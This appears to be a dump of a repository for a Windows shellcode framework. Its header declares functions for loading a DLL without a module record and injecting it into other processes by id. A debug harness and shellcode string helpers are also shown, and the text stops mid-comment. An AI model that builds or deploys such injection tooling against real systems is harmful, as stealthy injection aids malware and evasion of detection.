--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestDll/Debug/TestDll.dll.embed.manifest.res
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/Debug/TestDll.dll.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | 动态链接库:TestDll 项目概述
3 | ========================================================================
4 |
5 | 应用程序向导已为您创建了此 TestDll DLL。
6 |
7 | 本文件概要介绍组成 TestDll 应用程序的
8 | 每个文件的内容。
9 |
10 |
11 | TestDll.vcproj
12 | 这是使用应用程序向导生成的 VC++ 项目的主项目文件,
13 | 其中包含生成该文件的 Visual C++ 的版本信息,以及有关使用应用程序向导选择的平台、配置和项目功能的信息。
14 |
15 | TestDll.cpp
16 | 这是主 DLL 源文件。
17 |
18 | 此 DLL 在创建时不导出任何符号。因此,在生成此 DLL 时
19 | 将不会产生 .lib 文件。如果希望此项目
20 | 成为其他某个项目的项目依赖项,则需要
21 | 添加代码以从 DLL 导出某些符号,
22 | 以便产生一个导出库,或者,也可以在项目“属性页”对话框中的
23 | “链接器”文件夹中,将“常规”属性页上的
24 | “忽略输入库”属性设置为“是”。
25 |
26 | /////////////////////////////////////////////////////////////////////////////
27 | 其他标准文件:
28 |
29 | StdAfx.h, StdAfx.cpp
30 | 这些文件用于生成名为 TestDll.pch 的预编译头 (PCH) 文件和名为 StdAfx.obj 的预编译类型文件。
31 |
32 | /////////////////////////////////////////////////////////////////////////////
33 | 其他注释:
34 |
35 | 应用程序向导使用“TODO:”注释来指示应添加或自定义的源代码部分。
36 |
37 | /////////////////////////////////////////////////////////////////////////////
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/Release/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestDll/Release/BuildLog.htm
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/Release/TestDll.dll.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/TestDll.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestDll/TestDll.cpp
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/TestDll.vcproj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestDll/TestDll.vcproj
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/TestDll.vcproj.LF-20161216IWOX.Administrator.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
67 |
91 |
92 |
95 |
119 |
120 |
121 |
122 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/TestDll.vcproj.LF-20170306AJGT.Administrator.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
65 |
66 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/dllmain.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestDll/dllmain.cpp
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestDll/stdafx.cpp
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestDll/stdafx.h
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestDll/targetver.h
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/Debug/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/Debug/BuildLog.htm
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/Debug/TestShellcode.exe.embed.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/Debug/TestShellcode.exe.embed.manifest.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/Debug/TestShellcode.exe.embed.manifest.res
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/Debug/TestShellcode.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/Debug/TestShellcode.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/Debug/TestShellcode.res
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/ModuleLess.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/ModuleLess.cpp
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/ModuleLess.h:
--------------------------------------------------------------------------------
#ifndef _MODULELESS_H_
#define _MODULELESS_H_

// Parameter block handed to the shellcode entry point.  All four members are
// untyped pointers; this header does not say what they point at.  The debug
// harness in hhl_shellcodeframe/main.c fills them as: lpFileBase -> raw bytes
// of a DLL read from disk, lpProcName -> ANSI export name ("RunDll"),
// lpReserved / lpRunCmd -> wide strings.  Treat that as the presumed contract
// and confirm it against the consumer in ModuleLess.cpp / shellcode.c.
typedef struct _SHELL_CODE_PARAM
{
    PVOID lpFileBase;      // declared PVOID where the others are LPVOID; same type on Win32/Win64
    LPVOID lpReserved;
    LPVOID lpProcName;
    LPVOID lpRunCmd;
}SHELL_CODE_PARAM, *PSHELL_CODE_PARAM;

// Function-pointer type with the DllMain signature (module handle, reason code, reserved).
typedef BOOL (WINAPI *DLL_MAIN)( HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved);

// Function-pointer type for an export taking one wide command-line string.
typedef VOID (WINAPI *pRunDll)(LPCWSTR pszRunCmd);

// Declarations only; the definitions are in ModuleLess.cpp, whose text is not
// part of this listing.  All four share the (lpFileBase, ImageSize,
// szReserved, szProcName, szRunCmd) tuple; the two *Inject variants take a
// dwProcessId in addition.  NOTE(review): nothing here states who owns
// lpFileBase after the call, whether ImageSize is validated against the PE
// headers inside the buffer, or whether szProcName may be NULL -- check the
// definitions before relying on any of that.
namespace CModuleLess
{
    BOOL ModuleLessLoad(PVOID lpFileBase,SIZE_T ImageSize, LPCTSTR szReserved, LPCSTR szProcName, LPCTSTR szRunCmd);
    void ShellCodeModuleLessLoad(PVOID lpFileBase,SIZE_T ImageSize, LPCTSTR szReserved, LPCSTR szProcName, LPCTSTR szRunCmd);
    BOOL ModuleLessInject(DWORD dwProcessId, PVOID lpFileBase, SIZE_T ImageSize, LPCTSTR szReserved, LPCSTR szProcName, LPCTSTR szRunCmd);
    BOOL Wow64ModuleLessInjectToX64(DWORD dwProcessId, PVOID lpFileBase, SIZE_T ImageSize, LPCTSTR szReserved, LPCSTR szProcName, LPCTSTR szRunCmd);
}

#endif
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/ReadMe.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/ReadMe.txt
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/Release/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/Release/BuildLog.htm
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/Release/TestShellcode.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/Release/TestShellcode.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/Release/TestShellcode.res
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/TestShellcode.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/TestShellcode.aps
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/TestShellcode.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/TestShellcode.cpp
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/TestShellcode.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/TestShellcode.h
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/TestShellcode.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/TestShellcode.rc
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/TestShellcode.vcproj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/TestShellcode.vcproj
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/TestShellcode.vcproj.LF-20161216IWOX.Administrator.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
67 |
91 |
92 |
95 |
119 |
120 |
121 |
122 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/TestShellcodeDlg.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/TestShellcodeDlg.cpp
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/TestShellcodeDlg.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/TestShellcodeDlg.h
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/res/TestShellcode.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/res/TestShellcode.ico
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/res/TestShellcode.rc2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/res/TestShellcode.rc2
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/resource.h:
--------------------------------------------------------------------------------
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by TestShellcode.rc
//
// NOTE(review): this file is regenerated by the resource editor; hand edits
// (these comments included) may be dropped the next time the .rc is saved.
#define IDM_ABOUTBOX 0x0010
#define IDD_ABOUTBOX 100
#define IDS_ABOUTBOX 101
#define IDD_TESTSHELLCODE_DIALOG 102
#define IDR_MAINFRAME 128
#define IDC_RICHEDIT21_SHELLCODE 1000
#define IDC_EDIT_PROCESS_ID 1001
#define IDC_BUTTON_INJECT 1002
#define IDC_BUTTON_SHELL 1003
#define IDC_EDIT_API 1004
// Two control ids are defined twice under different names: 1005
// (IDC_BUTTON_GENERATEHASH / IDC_BUTTON_CALCHASH) and 1009
// (IDC_BUTTON1 / IDC_BUTTON_LOAD_DLL).  This typically happens when a
// control is renamed in the editor; harmless while both names mean the
// same control, but a latent clash if either id is reused for a new one.
#define IDC_BUTTON_GENERATEHASH 1005
#define IDC_BUTTON_CALCHASH 1005
#define IDC_EDIT_HASH 1006
#define IDC_EDIT_DLL_PATH 1007
#define IDC_BUTTON_INJECT_DLL 1008
#define IDC_BUTTON1 1009
#define IDC_BUTTON_LOAD_DLL 1009

// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 129
#define _APS_NEXT_COMMAND_VALUE 32771
#define _APS_NEXT_CONTROL_VALUE 1010
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif

--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/stdafx.cpp
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/stdafx.h
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/targetver.h
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/clear.bat:
--------------------------------------------------------------------------------
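@echo off
rem Deletes Visual C++ / Visual Studio intermediate files below the folder
rem this script lives in.  Interactive: the first "pause" is the confirmation
rem prompt, nothing is deleted until a key is pressed.
setlocal
rem Anchor to the script's own directory.  "del /S" recurses from the current
rem directory, so without this a run from a shortcut, another drive or a
rem different working directory would clean the wrong tree.
cd /d "%~dp0" || exit /b 1
echo ----------------------------------------------------
echo By MoreWindows (http://blog.csdn.net/MoreWindows)
echo Press any key to delete all files with ending:
echo *.idb *.ncp *.obj *.pch *.tmp *.sbr
echo *.pdb *.bsc *.ilk *.ncb *.opt
echo *.sdf *.dep *.ipch
echo below %CD%
echo There are Visual C++ and Visual Studio junk
echo ----------------------------------------------------
pause
rem /F also removes read-only files, /S recurses, /Q suppresses per-file prompts.
rem The pattern list is the one that is actually deleted; the echo above now
rem matches it (the old text also promised *.tlog, which was never deleted,
rem and listed *.tmp twice).
del /F /S /Q *.idb *.ncp *.obj *.pch *.sbr *.tmp *.pdb *.bsc *.ilk *.ncb *.opt *.sdf *.dep *.ipch
pause
endlocal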
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/Debug/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/Debug/BuildLog.htm
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/Debug/hhl_shellcodeframe.exe.embed.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/Debug/hhl_shellcodeframe.exe.embed.manifest.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/Debug/hhl_shellcodeframe.exe.embed.manifest.res
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/Debug/hhl_shellcodeframe.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/GetRing3ApiAddr.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/GetRing3ApiAddr.bin
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/Release/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/Release/BuildLog.htm
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/Release/GetRing3ApiAddr.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/Release/GetRing3ApiAddr.bin
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/Release/cmd.bat:
--------------------------------------------------------------------------------
@echo off
rem Opens an interactive command prompt in this directory; cmd.exe with no
rem arguments starts a new interactive shell.
cmd.exe
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/Release/hhl_shellcodeframe.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/Release/sh_helloworld.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/Release/sh_helloworld.exe
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/Release/sh_helloworld.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/ShellCode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/ShellCode.bin
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/cmd.bat:
--------------------------------------------------------------------------------
@echo off
rem Opens an interactive command prompt in this directory; cmd.exe with no
rem arguments starts a new interactive shell.
cmd.exe
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/hhl_shellcodeframe.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 10.00
3 | # Visual Studio 2008
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sh_helloworld", "hhl_shellcodeframe.vcproj", "{B0E6C01A-2E12-48C9-BB9A-49405143A91D}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Release|Win32 = Release|Win32
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Debug|Win32.ActiveCfg = Debug|Win32
13 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Debug|Win32.Build.0 = Debug|Win32
14 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Release|Win32.ActiveCfg = Release|Win32
15 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Release|Win32.Build.0 = Release|Win32
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/hhl_shellcodeframe.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/hhl_shellcodeframe.suo
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/hhl_shellcodeframe.vcproj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/hhl_shellcodeframe.vcproj
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/hhl_shellcodeframe.vcproj.LF-20161216IWOX.Administrator.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
67 |
91 |
92 |
95 |
119 |
120 |
121 |
122 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/hhl_shellcodeframe.vcproj.pxysocket-PC.pxysocket.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
65 |
66 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/main.c:
--------------------------------------------------------------------------------
1 | #include "shellcode.h"
2 | #include "shellcode_ntapi_utility.h"
3 | #include "nativeapi.h"
4 |
5 |
/*
 * Debug-build driver for the x86 shellcode frame.
 *
 * Under HHL_DEBUG: reads a DLL image from a fixed path into a heap buffer,
 * fills a SHELL_CODE_PARAM (image bytes, a wide "reserved" string, an ANSI
 * export name and a wide command string) and passes it by value to
 * ShellCode_Start(), then frees the buffers.  Without HHL_DEBUG it only calls
 * InitApiHashToStruct().  Declared "void main" -- non-standard; accepted by
 * the MSVC CRT but no exit status is reported to the caller.
 */
void main()
{

#ifdef HHL_DEBUG
    SHELL_CODE_PARAM ShellCodeParam;
    FILE *fp;
    int nLength;
    UCHAR* pFileBase;
    wchar_t* lpReserved;
    char* lpProcName;
    wchar_t* lpRunCmd = NULL;

    /* Hard-coded input path; the file is read whole, as raw bytes. */
    fp = fopen("c:\\testdll.dll", "rb");

    if(fp)
    {
        /* filelength()/fileno() are CRT extensions (MSVC / POSIX), not ISO C. */
        nLength = filelength(fileno(fp));
        pFileBase = (char*)malloc(nLength+1);   /* cast is char* but the variable is UCHAR*; harmless, just inconsistent */
        if(pFileBase)
        {
            memset(pFileBase, 0, nLength+1);
        }
        /* NOTE(review): fread runs even when malloc returned NULL (only the
         * memset is guarded), and its return value is not checked, so a
         * short read leaves a zero-filled tail with no error. */
        fread(pFileBase, nLength, 1, fp);
        fclose(fp);

    }
    else
    {
        return;
    }

    InitApiHashToStruct();

    ShellCodeParam.lpFileBase = pFileBase;

    /* NOTE(review): each of the three buffers below is MAX_PATH *bytes*, but
     * lpReserved and lpRunCmd are used as wchar_t arrays, so they hold only
     * MAX_PATH/2 characters.  Here the wide literal is formatted through an
     * LPSTR-cast pointer; which wsprintf variant that resolves to depends on
     * the UNICODE setting -- confirm the bytes land as the shellcode side
     * expects.  None of the malloc results is checked before memset. */
    lpReserved = (wchar_t*)malloc(MAX_PATH);
    memset(lpReserved, 0, MAX_PATH);
    wsprintf((LPSTR)lpReserved, L"Hello World!");
    ShellCodeParam.lpReserved = lpReserved;

    /* ANSI string; presumably the export name the shellcode resolves
     * (cf. lpProcName in SHELL_CODE_PARAM) -- verify against the consumer. */
    lpProcName = (char*)malloc(MAX_PATH);
    memset(lpProcName, 0, MAX_PATH);
    sprintf(lpProcName, "RunDll");
    ShellCodeParam.lpProcName = lpProcName;

    /* Wide command string; same byte-vs-wchar_t sizing caveat as lpReserved. */
    lpRunCmd = (wchar_t*)malloc(MAX_PATH);
    memset(lpRunCmd, 0, MAX_PATH);
    wsprintf(lpRunCmd, L"-a aaaaaaaaaaaa -u uuuuuuuuuuuuuu");
    ShellCodeParam.lpRunCmd = lpRunCmd;

    /* Struct is passed by value; ShellCode_Start is declared in one of the
     * included headers, its definition is not in this file. */
    ShellCode_Start(ShellCodeParam);

    /* Tear-down.  The NULL checks are redundant for free() but harmless. */
    if(lpRunCmd)
        free(lpRunCmd);

    if(lpProcName)
        free(lpProcName);

    if(lpReserved)
        free(lpReserved);

    if(pFileBase)
        free(pFileBase);
#else
    InitApiHashToStruct();
#endif
}
73 |
74 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/nativeapi.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/nativeapi.h
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/shellcode.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/shellcode.h
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/shellcode_ntapi_utility.c:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | #include "shellcode.h"
5 | #include "shellcode_ntapi_utility.h"
6 | #include "nativeapi.h"
7 |
8 |
9 | //注意写shellcode关闭 security cookie
10 |
11 | #define Shellcode_Final_End ShellCode_Ntapi_Utility_End
12 |
13 | #ifdef HHL_DEBUG
14 | extern PShellData lpData;
15 | #else
16 |
17 | #endif
18 |
19 |
20 |
21 |
22 |
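/*
 * Length of a NUL-terminated byte string, excluding the terminator.
 * str must point at a valid NUL-terminated string.
 *
 * Fix: the original compared each byte against the multi-character constant
 * '/0' (a slash followed by a zero digit), not the NUL character '\0'.  No
 * single byte can equal that value, so the loop never saw the terminator
 * and read past the end of the string.
 */
int sh_strlen(const char *str)
{
    int len = 0;
    while (*str++ != '\0')
        ++len;
    return len;
}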
30 |
/*
 * Compares two NUL-terminated strings ignoring ASCII case: bytes in A-Z are
 * folded to a-z before comparing, nothing else is touched.  Despite the name
 * this is a case-insensitive compare, identical in behaviour to
 * my_sh_stricmp below.
 *
 * Returns 0 when equal, otherwise the signed difference of the first pair of
 * folded bytes that differ (the terminator counts as 0, so a proper prefix
 * compares lower).
 */
int my_sh_strcmp(const char *dst, const char *src)
{
    int a, b;
    for (;;)
    {
        a = (unsigned char)*dst++;
        b = (unsigned char)*src++;
        if (a >= 'A' && a <= 'Z')
            a += 'a' - 'A';
        if (b >= 'A' && b <= 'Z')
            b += 'a' - 'A';
        /* stop at the end of dst or at the first mismatch */
        if (a == 0 || a != b)
            return a - b;
    }
}
43 |
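/*
 * Lower-cases the ASCII letters A-Z of s in place and returns s.
 * s must be writable and NUL-terminated (never pass a string literal).
 *
 * Fix: the original tested `> 'A' && < 'Z'`, so 'A' and 'Z' themselves were
 * never converted.  The unused local c1 is dropped.
 */
char * my_sh_strlwr(char *s)
{
    char *p;
    for (p = s; *p != '\0'; p++)
    {
        if (*p >= 'A' && *p <= 'Z')
            *p += 'a' - 'A';
    }
    return s;
}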
59 |
/*
 * Upper-cases the ASCII letters a-z of str in place; every other byte is left
 * alone.  Returns str.  str must be writable and NUL-terminated.
 */
char * my_sh_strupr(char *str)
{
    char *cur;
    for (cur = str; *cur; ++cur)
    {
        if (*cur < 'a' || *cur > 'z')
            continue;
        *cur -= 'a' - 'A';
    }
    return str;
}
71 |
72 |
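/*
 * Case-insensitive substring search (ASCII A-Z / a-z only).
 *
 * Returns a pointer into pString at the first occurrence of pFind, pString
 * itself when pFind is empty, or NULL when there is no match.
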